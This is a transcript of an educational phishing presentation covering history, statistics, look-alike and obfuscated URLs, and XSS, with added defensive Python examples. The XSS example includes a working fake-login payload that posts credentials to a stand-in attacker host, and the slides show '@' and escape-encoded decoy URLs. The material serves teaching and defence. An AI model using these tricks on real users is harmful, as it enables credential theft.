Phishing - PowerPoint PPT Presentation

Transcript and Presenter's Notes

1
Phishing
  • Prepared and presented by
  • Hendra Harianto Tuty

2
What is Phishing!?
  • In computing, phishing is a form of social
    engineering, characterized by attempts to
    fraudulently acquire sensitive information, such
    as passwords and credit card details, by
    masquerading as a trustworthy person or business
    in an apparently official electronic
    communication, such as an email or an instant
    message.
  • Phishers are phishing artists
  • Wikipedia, the free encyclopedia

3
History of Phishing
  • Phreaking + Fishing = Phishing
  • - Phreaking: making phone calls for free back in
    the 70s
  • - Fishing: using bait to lure the target
  • Phishing in 1995
  • - Target: AOL users
  • - Purpose: getting account passwords for free AOL
    time
  • - Threat level: low
  • - Techniques: similar names (www.ao1.com for
    www.aol.com), social engineering
  • Phishing in 2001
  • - Target: eBay users and major banks
  • - Purpose: getting credit card numbers and
    accounts
  • - Threat level: medium
  • - Techniques: same as in 1995, plus keyloggers

4
History of Phishing (Cont.)
  • Phishing in 2005
  • - Target: PayPal, banks, eBay
  • - Purpose: bank accounts
  • - Threat level: high
  • - Techniques: browser vulnerabilities, link
    obfuscation

5
How it works!?
  • Create a phishing server
  • Use social engineering in scam emails
  • - Use the spoofed identity of a trusted
    organization to gain trust
  • - Urge victims to update or validate their
    account
  • - Threaten to terminate the account if the
    victim does not reply
  • - Use a gift or bonus as bait
  • - Make security promises
  • Lure victims to a bogus site
  • - URL obfuscation
  • - Disguised website interface
  • Make the layout of the bogus website look the
    same as the original website
  • - Collect the username and password when victims
    try to log in
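The lure features on this slide (urging an account update, threatening closure, promising a gift or "security", and a link whose visible text names the trusted organization while its target is the bogus site) are exactly what a mail filter can look for. The following is an added example, not part of the original presentation: it scores a constructed HTML message for those features and reports links whose visible text and `href` point at different hosts. The phrase list, the scoring weights and the sample message (including the hostname www.mybank.secureaccess.com taken from the later slide) are assumptions of the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The social-engineering hooks listed on the slide, as regular expressions over
# the message text. This is a constructed starting set, not a complete list.
LURE_PATTERNS = {
    "update_or_validate": r"\b(update|validate|verify|confirm)\b.{0,40}\baccount\b",
    "account_threat": r"\b(suspend|terminat|clos|lock)\w*.{0,40}\baccount\b"
                      r"|\baccount\b.{0,40}\b(suspend|terminat|clos|lock)\w*",
    "gift_or_bonus": r"\b(gift|bonus|prize|reward|free)\b",
    "security_promise": r"\b(secure|security|protect)\w*",
}


class LinkExtractor(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(s):
    """Lower-cased host of a URL or bare domain ('' if there is none)."""
    if "://" not in s:
        s = "http://" + s
    return (urlsplit(s).hostname or "").lower()


def score_email(html_body):
    """Report which lure features appear and which links show one host in their
    visible text but send the click somewhere else (spoofed identity + bogus site)."""
    text = re.sub(r"<[^>]+>", " ", html_body)
    features = [name for name, pat in LURE_PATTERNS.items()
                if re.search(pat, text, re.IGNORECASE | re.DOTALL)]
    parser = LinkExtractor()
    parser.feed(html_body)
    mismatched = [(visible, href) for visible, href in parser.links
                  if "." in visible and host_of(visible) != host_of(href)]
    return {"lure_features": features,
            "mismatched_links": mismatched,
            "score": len(features) + 2 * len(mismatched)}


# Constructed sample message; the hostnames are hypothetical.
SAMPLE_EMAIL = """<html><body>
<p>Dear MyBank customer,</p>
<p>We have detected unusual activity. Please validate your account within 24 hours
or your account will be suspended. For your security, use our secure server:</p>
<p><a href="http://www.mybank.secureaccess.com/login">www.mybank.com</a></p>
</body></html>"""

if __name__ == "__main__":
    print(score_email(SAMPLE_EMAIL))
```

The mismatched-link check is the strongest signal here because it is hard for the phisher to avoid: the visible text must name the bank, but the target must be a site the phisher controls.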

6
Examples
7
More Examples
8
Facts
  • Phishing is a new trend in information theft
  • Phishing attacks get more and more sophisticated
  • Average monthly growth rate is 50%
  • Citibank, eBay, and AOL were the favorite targets
  • Country hosting the most phishing websites: USA
    (35%)
  • Source: July report, APWG

9
Facts (Cont.)
  • Data from Anti-Phishing Working Group

10
Facts (Cont.)
  • Estimated number of people who received phishing
    emails in 2004: 57 million
  • Those who opened the emails: 19%
  • Those who gave the information: 3-5%
  • At Earthlink, the cost per attack: $40,000
  • Source: July 2005 Report, APWG

11
Types of Phishing Attacks
  • Impersonation (simple attack)
  • - Direct attack
  • - Image link
  • - Fake site looks like the original site
  • Man-in-the-middle
  • - Use a link to direct the victims to a hostile
    site
  • Pop-up (creative attack)
  • - Not man-in-the-middle
  • - Direct victims to the real site, but pop up the
    hostile page

12
Techniques
  • Similar URL
  • URL Obfuscation
  • XSS (Cross-Site Scripting)

13
Similar URL
  • Cousin URLs such as www.aoI.com (capital I for l)
    or www.a0l.com (zero for o) in place of
    www.aol.com
  • Bad URLs (the brand name buried inside someone
    else's domain)
  • - Legitimate website: http://www.mybank.com
  • - Bogus websites: http://www.mybank.privatebanking.com
  •   http://www.mybank.com.ch
  •   http://www.mybank.secureaccess.com
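Both tricks on this slide can be checked mechanically: fold the characters that are commonly swapped in (0 for o, 1 or capital I for l) and compare the registrable domain, and flag any host that carries the brand name as a label but is registered under somebody else's domain. The following is an added example, not part of the original presentation. The allow-list of legitimate domains, the homoglyph table, and the "last two labels" approximation of the registrable domain (it has no public-suffix list, so co.uk-style suffixes are not handled) are assumptions of the example.

```python
from urllib.parse import urlsplit

# Constructed allow-list of legitimate registrable domains (assumption for this example).
LEGIT_DOMAINS = {"aol.com", "mybank.com"}

# Look-alike characters folded to the letter they imitate. Input is lower-cased
# first, so a capital I becomes "i" and then "l": "aoI.com" folds to "aol.com".
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "i": "l", "|": "l",
                            "5": "s", "3": "e", "4": "a"})


def hostname(url):
    """Lower-cased host of a URL; a bare domain without a scheme is accepted too."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").rstrip(".")


def registrable_domain(host):
    """Last two labels of the host. Simplification: without a public-suffix list,
    two-level suffixes such as co.uk are not handled correctly."""
    return ".".join(host.split(".")[-2:])


def fold(name):
    """Normalise look-alike characters so cousins compare equal to the real name."""
    return name.lower().translate(HOMOGLYPHS)


def classify(url):
    """Return 'legitimate', 'cousin' (look-alike spelling of a legitimate domain),
    'misleading' (brand name used as a label inside another domain) or 'unknown'."""
    host = hostname(url)
    reg = registrable_domain(host)
    if reg in LEGIT_DOMAINS:
        return "legitimate"
    if fold(reg) in {fold(d) for d in LEGIT_DOMAINS}:
        return "cousin"
    brands = {d.split(".")[0] for d in LEGIT_DOMAINS}
    if brands & set(host.split(".")):
        return "misleading"
    return "unknown"


if __name__ == "__main__":
    for u in ("http://www.aol.com", "http://www.aoI.com", "http://www.a0l.com",
              "http://www.mybank.privatebanking.com", "http://www.mybank.com.ch",
              "http://www.mybank.secureaccess.com"):
        print(f"{u:45} {classify(u)}")
```

Folding is deliberately aggressive: a genuine domain that happens to differ from a protected brand only by a look-alike character will be reported as a cousin, which is the right trade-off for a phishing filter but means the verdict should be a warning, not a block.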

14
URL Obfuscation
  • First of all, there are many representations of
    a URL
  • Normal address: http://www.google.com
  • Dotted address: http://64.233.167.99
  • Dot-less address: http://1089054563
  • Escape encoding: http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
  • All of these addresses led to the Google website
    at the time: the dot-less form is the same IP
    address written as a single 32-bit integer, and
    the escaped form is just "www.google.com" with
    every character percent-encoded

15
URL Obfuscation (Cont.)
  • Use of @
  • Common application:
    ftp://username:password@ftp.cse.ohio-state.edu
  • Bogus application
  • - http://www.bank.com@www.bad.com (everything
    before the @ is treated as a username; the
    browser connects to www.bad.com)
  • Use of escape encoding
  • - http://www.good.com@%77%77%77%2E%62%61%64%2E%63%6F%6D
  • What does it mean!!??
  • = http://www.good.com@www.bad.com
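The tricks on these two slides (the `@` userinfo decoy, the percent-escaped host and the dot-less integer address) all come down to one question: which host will the browser actually connect to? The following is an added example, not part of the original presentation, that answers it with the Python standard library so the slide's URLs can be checked offline; www.good.com and www.bad.com are the slide's own placeholder names. One caveat for today's practitioner: current browsers drop or warn about credentials embedded in http URLs, so the `@` decoy no longer looks as convincing in an address bar as it did in 2005, but the parsing rule it exploits is unchanged.

```python
import ipaddress
from urllib.parse import urlsplit, unquote


def dword_to_dotted(n):
    """Dot-less 32-bit integer -> dotted decimal, e.g. 1089054563 -> '64.233.167.99'."""
    return str(ipaddress.IPv4Address(n))


def dotted_to_dword(ip):
    """Dotted decimal -> dot-less integer, e.g. '64.233.167.99' -> 1089054563."""
    return int(ipaddress.IPv4Address(ip))


def deobfuscate(url):
    """Work out where an obfuscated URL really points.

    - Everything before '@' in the authority is userinfo (RFC 3986), not the
      host; urlsplit discards it, so http://www.bank.com@www.bad.com connects
      to www.bad.com.
    - %-escaped host characters are decoded ('%77%77%77' -> 'www').
    - A purely numeric host is a dword IP and is converted back to dotted form.
    Returns the decoy the victim is meant to read and the real host.
    """
    parts = urlsplit(url)
    host = unquote(parts.hostname or "").lower().rstrip(".")
    if host.isdigit():
        host = dword_to_dotted(int(host))
    return {
        "decoy": unquote(parts.username or ""),  # what the victim is meant to read
        "host": host,                            # what the browser connects to
    }


if __name__ == "__main__":
    for u in ("http://www.google.com",
              "http://64.233.167.99",
              "http://1089054563",
              "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D",
              "ftp://username:password@ftp.cse.ohio-state.edu",
              "http://www.bank.com@www.bad.com",
              "http://www.good.com@%77%77%77%2E%62%61%64%2E%63%6F%6D"):
        print(f"{u:55} -> {deobfuscate(u)}")
```

The decoding order matters: the userinfo must be split off before the host is unescaped, otherwise an escaped `%40` (`@`) in the decoy could move the boundary.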

16
XSS (Cross-Site Scripting)
  • An XSS vulnerability is caused by the failure of
    a site to validate user input before returning
    it to the client's web browser (quoted from
    http://www.cert.org)
  • Phishing scenario
  • - Victim logs into a web site
  • - Attacker has spread "mines" using an XSS
    vulnerability
  • - Victim stumbles upon an XSS mine
  • - Victim gets a message saying that their session
    has expired and they need to authenticate again
  • - Victim's username and password are sent to the
    attacker
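The scenario above needs a page on the real site that reflects an attacker-controlled parameter into its HTML unescaped; the "mine" is then just a link to that page, on the trusted domain, with a fake session-expired login form in the parameter. The following is an added example, not from the original presentation: the search page, the `q` parameter and the attacker host www.bad.com are hypothetical. It shows the vulnerable handler next to the hardened one and checks that the injected form is live in the first and rendered inert by HTML escaping in the second.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attacker payload (hypothetical collector at www.bad.com): a fake
# "session expired" login form that posts whatever the victim types to the attacker.
PAYLOAD = (
    '<form action="http://www.bad.com/collect" method="post">'
    "Your session has expired. Please log in again:"
    '<input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Log in"></form>'
)


def mine_link(site, payload=PAYLOAD):
    """The 'mine': a link on the REAL site's domain whose search parameter
    carries the payload, so the victim sees a trusted URL."""
    return f"http://{site}/search?q={quote(payload)}"


def query_of(url):
    """Query string of a URL, as the server-side handler would receive it."""
    return urlsplit(url).query


def render_vulnerable(query_string):
    """Reflects the 'q' parameter into the page verbatim: the defect CERT describes."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<html><body><h1>Results for: {q}</h1></body></html>"


def render_hardened(query_string):
    """Same page, but the untrusted value is HTML-escaped before it is embedded,
    so '<form ...>' arrives in the browser as literal text, not markup."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<html><body><h1>Results for: {html.escape(q, quote=True)}</h1></body></html>"


def has_injected_form(page):
    """True if the rendered page contains a live <form> element (the fake login prompt)."""
    return "<form" in page.lower()


if __name__ == "__main__":
    link = mine_link("www.mybank.com")
    qs = query_of(link)
    print("mine link:", link)
    print("vulnerable page shows login form:", has_injected_form(render_vulnerable(qs)))
    print("hardened page shows login form:  ", has_injected_form(render_hardened(qs)))
```

Output encoding at the point of insertion is the fix; "validating" the input by blocking a few keywords is not, because the payload can be re-encoded or assembled in ways a blocklist misses.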

17
Defenses
  • Education
  • Prevention

18
Prevention
  • Never respond to an email asking for personal
    information
  • Always check whether the site is secure; call
    the organization's phone number if necessary
  • Never click on a link in the email. Retype the
    address in a new window
  • Keep your browser updated
  • Keep your antivirus updated
  • Use a firewall

19
References
  • Wikipedia, the free encyclopedia.
    http://www.wikipedia.org
  • Anti-Phishing Working Group.
    http://www.antiphishing.org
  • Zeltser, Lenny. Trends in Impersonation Attacks:
    Technologies and Motivation.
    http://www.zeltser.com/presentations/impersonation-attacks.pdf
  • Drake, Christine E.; Oliver, Jonathan J.; Koontz,
    Eugene J. Anatomy of a Phishing Email.
    http://www.ceas.cc/papers-2004/114.pdf